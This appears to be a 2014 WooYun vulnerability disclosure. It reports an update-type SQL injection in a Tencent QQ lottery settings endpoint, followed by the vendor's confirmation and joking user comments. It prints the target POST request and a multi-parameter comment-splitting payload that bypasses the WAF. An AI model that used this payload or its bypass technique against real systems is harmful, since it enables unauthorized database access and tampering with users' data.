腾讯QQ彩票某处SQL注射

注入地址：

POST /my/index.php?mod=securityinfo&op=AjaxUpdateTipsSet HTTP/1.1
 Host: 888.sports.qq.com
 
 typ=kjhm&kjhm_ssq=1&kjhm_dlt=0&kjhm_fc3d=0&kjhm_pl3=0&kjhm_pl5=0&kjhm_qlc=0&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0

除了 typ 参数外，其它参数都存在SQL注入

猜是 update 型 注入

像 update table set kjhm_ssq=1，kjhm_dlt=0 ...... where uid=xxxxx

由于这里太多参数，所以可以结合多参数方式绕过waf拦截

方式1：

typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=1),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=2),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*

根据参数顺序不同来绕过。有多种组合来实现过滤拦截。

由于大部分工具不支持，那么我们来第二种。

方式2：

参考： WooYun: 腾讯某分站一个比较有意思的SQL注射漏洞

继续可用。。

过滤

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-07-28 09:27

厂商回复：

非常感谢您的报告，问题已着手处理，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

最新状态：

暂无

1. 2014-07-23 15:50 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

   2

   很棒

   1# 回复此人

2. 2014-07-23 15:52 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

   0

   这个屌了。。。

   2# 回复此人

3. 2014-07-23 15:52 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

   0

   可以中500w吗？

   3# 回复此人

4. 2014-07-23 15:58 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

   0

   本来我该中奖了，谁给我改了

   4# 回复此人

5. 2014-07-23 16:02 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   0

   500万 在哪里

   5# 回复此人

6. 2014-07-23 16:06 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )

   0

   前排卖彩票

   6# 回复此人

7. 2014-07-23 16:38 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

   0

   给力

   7# 回复此人

8. 2014-07-23 17:32 | 紫衣大侠 ( 普通白帽子 | Rank:296 漏洞数:30 | 打杂的～～)

   0

   为毛这么牛B。。。

   8# 回复此人

9. 2014-07-23 17:34 | Lonely ( 实习白帽子 | Rank:80 漏洞数:30 | 人生如梦,始终都游不过当局者迷的悲哀。)

   0

   我买中了的 结果被洞主改了数据 还我 500万。

   9# 回复此人

10. 2014-07-23 17:44 | noob ( 实习白帽子 | Rank:85 漏洞数:19 | 向各位大神学习，向各位大神致敬)

    0

    我的1000万是不是你改的！！！

    10# 回复此人

11. 2014-07-23 17:56 | Aerfa21 ( 普通白帽子 | Rank:216 漏洞数:49 )

    0

    洞主，你是怎么绕waf的？

    11# 回复此人

12. 2014-07-23 18:20 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心，方得始终。)

    0

    居然还能挖腾讯sql

    12# 回复此人

13. 2014-07-23 19:32 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱，如果不服你TM来打我啊--哎呀...)

    0

    500万呢

    13# 回复此人

14. 2014-07-23 19:48 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

    1

    非常感谢您的报告，该问题其他白帽子已报告过，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

    14# 回复此人

15. 2014-07-23 22:59 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @1c3z 经常听到...

    15# 回复此人

16. 2014-07-24 12:17 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    0

    今晚一起买彩票~

    16# 回复此人

17. 2014-07-25 11:33 | 黑色的屌丝 ( 实习白帽子 | Rank:39 漏洞数:6 | →_→→_→)

    0

    我就想知道。一哥怎么快速定位一个注入点的。

    17# 回复此人

18. 2014-07-28 09:37 | C4ndy ( 路人 | Rank:6 漏洞数:1 )

    0

    我的彩票绝对是让你改的,

    18# 回复此人

19. 2014-07-28 09:56 | 紫霞仙子 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队，啥都干不成！！！)

    0

    还我100000万

    19# 回复此人

20. 2014-09-06 17:51 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖，不如相濡以沫)

    0

    快速定位一个注入点的

    20# 回复此人

21. 2014-09-06 18:21 | yinian ( 实习白帽子 | Rank:71 漏洞数:25 | 一花一世界，一叶一菩提。)

    0

    赶紧脱裤

    21# 回复此人

22. 2014-10-08 17:36 | 胡小树 ( 实习白帽子 | Rank:66 漏洞数:13 | 我是一颗小小树)

    0

    这组合看的真头晕

    22# 回复此人

23. 2014-11-05 16:38 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力，而是努力了才...)

    0

    真的好强大！

    23# 回复此人

24. 2014-12-19 16:22 | 风之传说 ( 普通白帽子 | Rank:217 漏洞数:39 | 时间在哪里，成就就在哪里.)

    1

    真特么屌爆了。。代码牛伤不起啊。。

    24# 回复此人